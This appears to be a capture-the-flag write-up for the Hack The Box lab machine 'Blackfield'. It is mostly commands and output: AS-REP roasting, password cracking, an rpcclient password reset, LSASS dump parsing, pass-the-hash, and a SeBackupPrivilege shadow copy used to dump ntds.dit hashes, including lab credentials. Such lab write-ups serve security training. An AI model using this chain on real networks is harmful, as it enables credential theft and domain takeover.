Author: Ikonw

Nmap Scan:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-07 20:09 +08
Nmap scan report for 10.10.10.192
Host is up (0.0074s latency).

PORT     STATE    SERVICE       VERSION
88/tcp   open     kerberos-sec  Microsoft Windows Kerberos (server time: 2020-09-07 19:09:38Z)
135/tcp  open     msrpc         Microsoft Windows RPC
139/tcp  filtered netbios-ssn
389/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open     microsoft-ds?
593/tcp  open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open     ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m59s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-09-07T19:09:47
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.59 seconds

Launch smbmap login using anonymous account, found 2 files we can read

┌──(root💀kali)-[/opt/nmapAutomator]
└─# smbmap -H 10.10.10.192 -u anonymous                                                                                   2 ⨯
[+] Guest session       IP: 10.10.10.192:445    Name: 10.10.10.192                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                NO ACCESS       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        profiles$                                               READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 

Access to profiles$

We found tons of user name, use along with awk command we collect the usernames

smbclient \\\\10.10.10.192\\profiles$ -c ls | awk '{print $1}' > user.lst

Launch the impacket tool GetNPUsers.py

┌──(root💀kali)-[~/Desktop/hackthebox/Windows/blackfield]
└─# python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py BLACKFIELD.local/ -no-pass -usersfile user.lst | grep -v "not found"
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:d3f58a3eb5d36dc74f2c4a4335a5ce3e$06ce4ccf78e620d6e2e9994bd546f519cabec98dd1879365456bcee2081d7f0579d8e6b20d7b0e5750c533de72b48404ad38bf2241acc01cdf9e1868717cb01142ab131ebda7de2a0916a141ba5b1fd1b8e0895833ea57ce4b01cd93900eba7c4bab1e1a8dfcdb471486fedc1f731b5e65f38219e37883274350288d916e18f43359a170dd9aa3ef22d53c399378ed3467467211d6be448ee73983abe6cf7998725bfa70b7de45969715c15417af5249ebe9dd16332222f17101bbb1bdbfc2d32ac2bc319302911973a88a2b67fd425092e0f31329d04fd9eca106a97f2265185f6ae6c8ca8e747272dcad410bfbedac0275ed12
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax

Save the hash and use john to crack it.

We got the creds support:#00^BlackKnight

┌──(root💀kali)-[~/Desktop/hackthebox/Windows/blackfield]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt user_hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight  ($krb5asrep$23$support@BLACKFIELD.LOCAL)
1g 0:00:00:16 DONE (2020-09-07 21:30) 0.06203g/s 889266p/s 889266c/s 889266C/s #1ByNature..#*burberry#*1990
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Try login using winrm port, but it failed.

Let’s go back to use new credentials to smb server

┌──(root💀kali)-[~/Desktop/hackthebox/Windows/blackfield]
└─# smbmap -H 10.10.10.192 -u support -p "#00^BlackKnight"                                                                2 ⨯
[+] IP: 10.10.10.192:445        Name: BLACKFIELD.local                                  
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                NO ACCESS       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        profiles$                                               READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share 

Found nothing interesting

use rpcclient connect to rpc

rpcclient -U blackfield.local\\support 10.10.10.192
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[BLACKFIELD764430] rid:[0x451]
user:[BLACKFIELD538365] rid:[0x452]
user:[BLACKFIELD189208] rid:[0x453]
user:[BLACKFIELD404458] rid:[0x454]
user:[BLACKFIELD706381] rid:[0x455]
user:[BLACKFIELD937395] rid:[0x456]
...........................

We got tons of user again.

After research, nothing special. But came along with a article using rpc to reset domain user password

Reset AD User password with Linux

Make a change to user audit2020 password to Ikonw123!

rpcclient $> setuserinfo2
Usage: setuserinfo2 username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> setuserinfo2 audit2020 23 Ikonw123!

Sadly, we still not able login using winrm but we can access audit2020‘s smb share again.

yeah smb share againnnn.

This time round, forensic folder is available to us

┌──(root💀kali)-[/opt/nmapAutomator/10.10.10.192/nmap]
└─# smbmap -H 10.10.10.192 -u audit2020 -p Ikonw123!
[+] IP: 10.10.10.192:445        Name: BLACKFIELD.local                                  
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                READ ONLY       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        profiles$                                               READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share 

┌──(root💀kali)-[/opt/nmapAutomator/10.10.10.192/nmap]
└─# smbclient \\\\10.10.10.192\\forensic -U audit2020                                      
Enter WORKGROUP\audit2020's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Feb 23 21:03:16 2020
  ..                                  D        0  Sun Feb 23 21:03:16 2020
  commands_output                     D        0  Mon Feb 24 02:14:37 2020
  memory_analysis                     D        0  Fri May 29 04:28:33 2020
  tools                               D        0  Sun Feb 23 21:39:08 2020

                7846143 blocks of size 4096. 3978511 blocks available
smb: \>

Alright, it seems tons of files. Download the folder to local (If your internet connection is slow, you might also consider just mount the smb directory to local)

recurse ON
prompt OFF
mget *

A DMP file is a file that contains data “dumped” from a program’s memory space. It is often created when a program has an error or crashes and may also be saved by the program “Savedump.exe” on the first reboot after a crash. DMP files are usually named “Memory.dmp.”

pypykatz has the ability to parse the secrets hidden in the LSASS process, it is just something like mimikatz’s sekurlsa::

pypykatz lsa minidump lsass.DMP

and we actually got the password hash for user svc_backup

== MSV ==
        Username: svc_backup
        Domain: BLACKFIELD
        LM: NA
        NT: 9658d1d1dcd9250115e2205d9f48400d
        SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c

No need to bruteforce, we can directly pass the hash using evil-winrm

──(root💀kali)-[/opt/nmapAutomator/10.10.10.192/nmap/memory_analysis]
└─# evil-winrm.rb -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192   

Privilege escalation

After checking the user’s privileges, found out that SeBackupPrivilege is enabled.

SeBackupPrivilege
Description: This privilege causes the system to grant all read access control to any file, regardless of the access control list (ACL) specified for the file.

Firstly, I tried the vssadmin, well I don’t have the privilege

*Evil-WinRM* PS C:\Users> vssadmin create shadow /for=C:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Error: You don't have the correct permissions to run this command.  Please run this utility from a command
window that has elevated administrator privileges.

Members of “Backup Operators” can logon locally on a Domain Controller and backup the NTDS.DIT, for ex. with: “wbadmin.exe” or “diskshadow.exe

As I read carefully, found out that diskshadow allow us to create a new shadow disk copy of the disk C and expose it as another driver

shadow_copy.txt

set context persistent nowriters
add volume c: alias ikonw
create
expose %ikonw% z:

However it has error

-> set context persistent nowriter  <<--- shudnt it be nowriters?

SET CONTEXT { CLIENTACCESSIBLE | PERSISTENT [ NOWRITERS ] | VOLATILE [ NOWRITERS ] }

        CLIENTACCESSIBLE        Specify to create shadow copies usable by client versions of Windows.
        PERSISTENT              Specify that shadow copy is persist across program exit, reset or reboot.
        PERSISTENT NOWRITERS    Specify that shadow copy is persistent and all writers are excluded.
        VOLATILE                Specify that shadow copy will be deleted on exit or reset.
        VOLATILE NOWRITERS      Specify that shadow copy is volatile and all writers are excluded.

        Example: SET CONTEXT CLIENTACCESSIBLE

Add extra character behind

set context persistent nowriterss
add volume c: alias ikonww
createe
expose %ikonw% z::

However one more error!!

The .cab metadata file cannot be stored in the current working directory, because it is read-only.

ermmm, maybe I am in the document directory

create a temp folder at C:\temp

Finally, we successfully create the shadow disk at Z: drive

*Evil-WinRM* PS C:\temp> diskshadow /s shadow_copy.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  9/8/2020 5:40:45 AM

-> set context persistent nowriters
-> add volume c: alias ikonw
-> create
Alias ikonw for shadow ID {f3ecf98c-d3cb-4ffe-8dc8-b613d3ab5922} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {115480f7-6f83-46ee-8ea6-4fcf8bcb1d81} set as environment variable.

Querying all shadow copies with the shadow copy set ID {115480f7-6f83-46ee-8ea6-4fcf8bcb1d81}

        * Shadow copy ID = {f3ecf98c-d3cb-4ffe-8dc8-b613d3ab5922}               %ikonw%
                - Shadow copy set: {115480f7-6f83-46ee-8ea6-4fcf8bcb1d81}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
                - Creation time: 9/8/2020 5:40:45 AM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
                - Originating machine: DC01.BLACKFIELD.local
                - Service machine: DC01.BLACKFIELD.local
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %ikonw% z:
-> %ikonw% = {f3ecf98c-d3cb-4ffe-8dc8-b613d3ab5922}
The shadow copy was successfully exposed as z:\.
->

The z: drive shadow folder permission also inherited from the C:, we dont have the permission to download the files.

After looking at the github page

• If you want to read/copy data out of a “normally forbidden” folder, you have to act as a backup software. The shell copy command won’t work; you’ll need to open the source file manually using CreateFile making sure to specify the FILE_FLAG_BACKUP_SEMANTICS flag.

SeBackupPrivilegeCmdLets.dll

SeBackupPrivilegeUtils.dll

Evil-WinRM* PS C:\temp> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\temp> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\temp> cd z:\windows\ntds
*Evil-WinRM* PS z:\windows\ntds> Copy-FileSeBackupPrivilege ntds.dit c:\temp\ntds.dit
*Evil-WinRM* PS z:\windows\ntds> cd c:\temp
*Evil-WinRM* PS C:\temp> dir


    Directory: C:\temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         9/8/2020   5:40 AM            617 2020-09-08_5-40-45_DC01.cab
-a----         9/8/2020   5:52 AM       18874368 ntds.dit
-a----         9/8/2020   5:50 AM          12288 SeBackupPrivilegeCmdLets.dll
-a----         9/8/2020   5:51 AM          16384 SeBackupPrivilegeUtils.dll
-a----         9/8/2020   5:40 AM             88 shadow_copy.txt

and we got the ntds.dit files. download to kali

and use secretsdump ,I just realize still need a extra system hive file.

reg save HKLM\SYSTEM c:\temp\system.hive

┌──(root💀kali)-[~/Desktop/hackthebox/Windows/blackfield]
└─# python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -ntds ntds.dit -system system.hive -hashes lmhash:nthash LOCAL -outputfile hash | more
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:65557f7ad03ac340a7eb12b9462f80d6:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:c95ac94a048e7c29ac4b4320d7c9d3b5:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::

and we got the administrator hash, use evil-winrm to login and we got root!